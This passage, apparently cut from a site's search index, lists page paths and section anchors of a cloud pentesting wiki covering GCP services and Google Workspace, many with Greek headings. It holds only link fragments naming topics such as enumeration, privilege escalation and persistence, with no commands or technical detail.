tml#Μη-Αυθεντικοποιημένη-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#gcp---cloud-scheduler-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#service-accounts","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp---compute-enum","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp-vpc--networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Υπολογιστικά-instances","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Αριθμητική","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Μη-Αυθεντικοποιημένη-enum","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Καταγραφές-Σειριακής-Κονσόλας","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#startup-scripts-output","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#os-configuration-manager","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Εικόνες","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Προσαρμοσμένες-Εικόνες","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Προσαρμοσμένα-Πρότυπα-Στιγμιότυπων","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#snapshots","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration-2","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Ανύψωση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#gcp---compute-instances","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#confidential-vm","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#disk--disk-encryption","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#deploy-container","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#service-account","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#extra-security","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#vm-access","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#metadata","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#Κρυπτογράφηση","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#gcp---vpc--networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#gcp-compute-networking-in-a-nutshell","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#vpc-Υποδίκτυα--firewalls-στο-gcp","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#Υποδίκτυα","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#firewalls","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#Πολιτικές-firewall-Ιεραρχίας","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#Αξιολόγηση-Κανόνων-firewall","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#vpc-network-peering","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#gcp---composer-enum","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#gcp---Κοντέινερ--gke-enum","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#Κοντέινερ","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#node-pools","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#kubernetes","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#tls-boostrap-privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#secrets-in-kubelet-api","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#basic-infromation","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#components","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#cluster-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#Καταμέτρηση-Εργασιών","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#connections","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#backups","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#authenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#Πρόσβαση-σε-πληροφορίες-με-appid-και-api-key","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-principals--org-policies-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Λογαριασμοί-Υπηρεσιών","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Καταμέτρηση","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Χρήστες--Ομάδες","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Απαρίθμηση","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#Προεπιλεγμένες-Άδειες","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-policies","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Επίπεδο-Προστασίας-Κλειδιών","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Σκοποί-Κλειδιών","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Περίοδος-Περιστροφής--Προγραμματισμένη-για-καταστροφή-περίοδος","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Κύρια-Έκδοση","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Αριθμητική","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#logs-flow","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#configurations-supported-by-gcp-logging","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---memorystore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---monitoring-enum","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#policies","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#dashboards","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#channels","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#snoozers","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---pubsub-enum","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#snapshots--schemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#Κλιμάκωση-Δικαιωμάτων--Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#Αρίθμηση","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---secrets-manager-enum","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#rotation-misuse","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---security-enum","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#security-command-center","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#threats","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#detections-and-controls","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#zero-trust","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---spanner-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---storage-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage-types","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#access-control","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versioning","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#retention-policy","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#public-access","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#hmac-keys","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Μη-Αυθεντικοποιημένη-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#privesc-και-Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Από-gcp-σε-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Βασικά-της-Εξουσιοδότησης-σε-Επίπεδο-Τομέα","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Συμβιβασμός-Υφιστάμενης-Εξουσιοδότησης","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Δημιουργία-νέας-εξουσιοδότησης-persistence","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Δημιουργία-Έργου-για-την-καταμέτρηση-του-workspace","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Κατάχρηση-διαπιστευτηρίων-gcloud","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Από-gws-σε-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Πρόσβαση-σε-προνομιούχους-χρήστες-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Κλιμάκωση-προνομίων-google-groups","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---Κατανόηση-της-Εξουσιοδότησης-σε-Επίπεδο-Τομέα","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#Κατανόηση-της-Εξουσιοδότησης-σε-Επίπεδο-Τομέα","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#Εξουσιοδότηση-σε-Επίπεδο-Τομέα-Από-Κοντά","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---Μη-Αυθεντικοποιημένη-enum--Πρόσβαση","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Ανακάλυψη-Δημόσιων-Πόρων","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Δημόσιοι-Πόροι-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#Κάδοι-firebase-Εφαρμογές--Λειτουργίες-cloud","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---api-keys-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#api-keys","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#osint-techniques","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#check-origin-gcp-project---apikeyskeyslookup","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#brute-force-api-endspoints","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---app-engine-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#brute-force-subdomains","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---Καταχώρηση-Άρθρων-Χωρίς-Αυθεντικοποίηση","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#Καταχώρηση-Άρθρων","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#Σύγχυση-Εξαρτήσεων","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---cloud-build-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---cloud-functions-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#brute-force-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerate-open-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#enumerate-open-cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---cloud-sql-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---compute-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---server-side-request-forgery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#Ευάλωτες-εκτεθειμένες-υπηρεσίες","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-principals--org-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam--gcp-principals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#Χρησιμοποιείται-το-domain-στο-workspace","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#Καταμέτρηση-emails-και-λογαριασμών-υπηρεσιών","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---Ανεξέλεγκτη-Καταμέτρηση-Πηγών","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#Πηγές","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#Συμβιβασμός-Εξωτερικής-Πηγής","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---Αποθήκευση-Μη-Αυθεντικοποιημένη-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#Αποθήκευση","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#Δημόσιο-bucket-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#Αναζήτηση-Ανοιχτών-buckets-στον-Τρέχοντα-Λογαριασμό","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---Δημόσια-Σκεύη-Υπερβάθμιση-Προνομίων","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Υπερβάθμιση-Προνομίων-Σκευών","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Έλεγχος-Αδειών","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Υπερβάθμιση","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#Αναφορές","pentesting-cloud/workspace-security/index.html#gws---workspace-pentesting","pentesting-cloud/workspace-security/index.html#entry-points","pentesting-cloud/workspace-security/index.html#google-platforms-and-oauth-apps-phishing","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-exploitation","pentesting-cloud/workspace-security/index.html#gws-gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--directory-sync-ad--entraid","pentesting-cloud/workspace-security/index.html#persistence","pentesting-cloud/workspace-security/index.html#account-compromised-recovery","pentesting-cloud/workspace-security/index.html#references","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---post-exploitation","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-groups-privesc","pentesting-cloud/workspace-security/gws-post-exploitation.html#access-groups-mail-info","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-pivoting","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---download-everything-google-knows-about-an-account","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---download-all-the-workspace-data-of-users","pentesting-cloud/workspace-security/gws-post-exploitation.html#contacts-download","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-drive-mining","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#modify-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#administrate-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#references","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistence","pentesting-cloud/workspace-security/gws-persistence.html#persistence-in-gmail","pentesting-cloud/workspace-security/gws-persistence.html#app-passwords","pentesting-cloud/workspace-security/gws-persistence.html#change-2-fa-and-similar","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-oauth-apps","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-delegation","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-android-app","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via--app-scripts","pentesting-cloud/workspace-security/gws-persistence.html#references","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad--entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#Από-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#Από-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-dire